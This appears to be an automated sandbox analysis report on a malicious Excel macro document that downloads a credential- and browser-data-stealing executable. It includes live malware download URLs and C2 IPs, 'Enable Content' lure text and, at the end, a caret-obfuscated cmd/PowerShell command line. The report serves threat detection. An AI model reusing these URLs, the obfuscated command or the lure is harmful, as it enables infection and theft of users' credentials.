Analysis Report ul9kpUwYel.xls

Overview

General Information

Sample Name: ul9kpUwYel.xls
Analysis ID: 337274
MD5: c2ca4d5f2632597023b6cf5b496fb4ed
SHA1: 076f6120eb80059c41e8d731d59471a2e9d81ad8
SHA256: 1ed66ae579df680aae0c4469e916cc97a943e9f600a4d55767755456d6079c75
Tags: SilentBuilderxls

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Powershell downloading file from url shortener site
Contains functionality to steal Internet Explorer form passwords
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Machine Learning detection for dropped file
Obfuscated command line found
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Yara detected Obfuscated Powershell
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://chebo.discountmonumentcenter.com/vantuz_2021.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: trashbininspector.fun Virustotal: Detection: 8%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\cr.exe ReversingLabs: Detection: 72%
Multi AV Scanner detection for submitted file
Source: ul9kpUwYel.xls Virustotal: Detection: 41%
Source: ul9kpUwYel.xls Metadefender: Detection: 22%
Source: ul9kpUwYel.xls ReversingLabs: Detection: 34%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\cr.exe Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0040B831 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree, 24_2_0040B831
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00409D52 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree, 24_2_00409D52
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0041A507 __EH_prolog,_strlen,CryptStringToBinaryA, 24_2_0041A507
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0040A753 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree, 24_2_0040A753
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0040908B __EH_prolog,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,LocalAlloc,BCryptDecrypt,BCryptCloseAlgorithmProvider,BCryptDestroyKey, 24_2_0040908B
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004233DC CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree, 24_2_004233DC
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004235AF lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree, 24_2_004235AF
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0040964F __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData, 24_2_0040964F
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004339BC lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlenA, 24_2_004339BC
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0029362C CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree, 24_2_0029362C
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0028A757 __EH_prolog,_strlen,CryptStringToBinaryA, 24_2_0028A757
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002937FF CredEnumerateW,CryptUnprotectData,LocalFree,AuditFree, 24_2_002937FF
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0027989F __EH_prolog,wsprintfA,CryptUnprotectData, 24_2_0027989F
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0027A9A3 __EH_prolog,wsprintfA,_wcsstr,_wcsstr,_wcsstr,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree, 24_2_0027A9A3
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0027BA81 __EH_prolog,wsprintfA,_wcsstr,_wcsstr,_wcsstr,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree, 24_2_0027BA81
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002A3C0C lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlen, 24_2_002A3C0C
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00279FA2 __EH_prolog,wsprintfA,_wcsstr,CryptUnprotectData,LocalFree, 24_2_00279FA2

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown HTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.18.58.219:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.18.58.219:443 -> 192.168.2.22:49177 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2145478746.0000000002AA0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2164368901.0000000002A50000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2153405530.000000001B420000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2189543252.00000000028F0000.00000002.00000001.sdmp
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043DCD2 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 24_2_0043DCD2
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0045F42D FindFirstFileExW, 24_2_0045F42D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043DCF2 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 24_2_0043DCF2
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043DE3D GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose, 24_2_0043DE3D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002AE08D GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose, 24_2_002AE08D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002CF67D FindFirstFileExW, 24_2_002CF67D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002ADF22 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 24_2_002ADF22
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002ADF42 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 24_2_002ADF42
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00434AFC __EH_prolog,GetLogicalDriveStringsA, 24_2_00434AFC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: cutt.ly
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 104.22.1.232:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 104.22.1.232:443

Networking:

Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 08 Jan 2021 08:06:19 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Mon, 04 Jan 2021 21:24:49 GMTAccept-Ranges: bytesContent-Length: 565248Keep-Alive: timeout=5, max=75Content-Type: application/x-msdownload
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /bat/scriptxls_bcb01d52-349f-4210-b1fc-2540a097ee09_fteenetx_wdexclusion.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /vantuz_2021.exe HTTP/1.1Host: chebo.discountmonumentcenter.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 195.201.225.248
Source: Joe Sandbox View IP Address: 37.46.150.139
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown HTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.18.58.219:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.18.58.219:443 -> 192.168.2.22:49177 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: global traffic HTTP traffic detected: GET /bat/scriptxls_bcb01d52-349f-4210-b1fc-2540a097ee09_fteenetx_wdexclusion.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /vantuz_2021.exe HTTP/1.1Host: chebo.discountmonumentcenter.comConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: cutt.ly
Source: powershell.exe, 00000007.00000002.2144318291.00000000023C0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2162227868.0000000002480000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2144277775.00000000024C0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000007.00000002.2144318291.00000000023C0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2162227868.0000000002480000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2144277775.00000000024C0000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2188981999.0000000002500000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 0000000A.00000002.2160741511.00000000003FE000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.2143296812.000000000032E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 0000000A.00000002.2160741511.00000000003FE000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.2143296812.000000000032E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49177 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to record screenshots
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004254E5 __EH_prolog,GdiplusStartup,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,_mbstowcs,GdipSaveImageToFile,DeleteObject,GdiplusShutdown, 24_2_004254E5

E-Banking Fraud:

Drops certificate files (DER)
Source: C:\Users\user\AppData\Roaming\cr.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

System Summary:

Malicious sample detected (through community Yara rule)
Source: dump.pcap, type: PCAP Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000011.00000002.2156606049.000000000370B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: C:\Users\user\Documents\pd.bat, type: DROPPED Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: document is protected. 20 21 :: 1. Open the document in Microsoft Office. Prev'ewir 24 25 work
Source: Screenshot number: 4 Screenshot OCR: protected documents. 26 27 2. If you downloaded this document from your email 28 29 Editing" fro
Source: Screenshot number: 8 Screenshot OCR: document is protected. 20 21 :: 1. Open the document in Microsoft Office. Prev'ewir 24 25 work
Source: Screenshot number: 8 Screenshot OCR: protected documents. 26 27 2. If you downloaded this document from your email 28 29 Editing" fro
Source: Screenshot number: 12 Screenshot OCR: document is protected. 21 :: 1. Open the document in Microsoft Office. Prev'ewir 24 25 work for
Source: Screenshot number: 12 Screenshot OCR: protected documents. 26 27 2. If you downloaded this document from your email 28 29 Editing" fro
Source: Document image extraction number: 0 Screenshot OCR: document is protected. 1. Open the document in Microsoft Office. Previewing online does not work f
Source: Document image extraction number: 0 Screenshot OCR: protected documents. 2. If you downloaded this document from your email, please click "Enable Edit
Source: Document image extraction number: 0 Screenshot OCR: Enable Content" on the yellow bar above.
Source: Document image extraction number: 1 Screenshot OCR: document is protected. 1. Open the document in Microsoft Office. Previewing online does not work f
Source: Document image extraction number: 1 Screenshot OCR: protected documents. 2. If you downloaded this document from your email, please click "Enable Edit
Source: Document image extraction number: 1 Screenshot OCR: Enable Content" on the yellow bar above.
Found Excel 4.0 Macro with suspicious formulas
Source: ul9kpUwYel.xls Initial sample: EXEC
Found obfuscated Excel 4.0 Macro
Source: ul9kpUwYel.xls Initial sample: High usage of CHAR() function: 21
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\cr.exe
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\cr.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\cr.exe Memory allocated: 76D20000 page execute and read and write
Detected potential crypto function
Document contains embedded VBA macros
Source: ul9kpUwYel.xls OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 002D76B0 appears 153 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 002BED89 appears 75 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 0027F4FF appears 176 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 002AFA10 appears 81 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 0040F2AF appears 181 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 0043F7C0 appears 82 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 002AFE70 appears 51 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 00467460 appears 172 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 0044EB39 appears 77 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 0043FC20 appears 61 times
PE file contains more sections than normal
Source: sqlite3.dll.24.dr Static PE information: Number of sections : 18 > 10
PE file contains strange resources
Source: cr.exe.23.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cr.exe.23.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature match
Source: ul9kpUwYel.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: dump.pcap, type: PCAP Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000011.00000002.2156606049.000000000370B000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: C:\Users\user\Documents\pd.bat, type: DROPPED Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: classification engine Classification label: mal100.spyw.expl.evad.winXLS@36/22@17/5
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00437BD1 __EH_prolog,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,OpenProcessToken,DuplicateTokenEx,CloseHandle,GetModuleFileNameA,_strlen,_mbstowcs,CreateProcessWithTokenW,CloseHandle,Process32NextW, 24_2_00437BD1
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043433D CoCreateInstance, 24_2_0043433D
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\251F0000
Source: C:\Users\user\AppData\Roaming\cr.exe Mutant created: \Sessions\1\BaseNamedObjects\dfthorbnjuser
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD29.tmp
Source: ul9kpUwYel.xls OLE indicator, Workbook stream: true
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'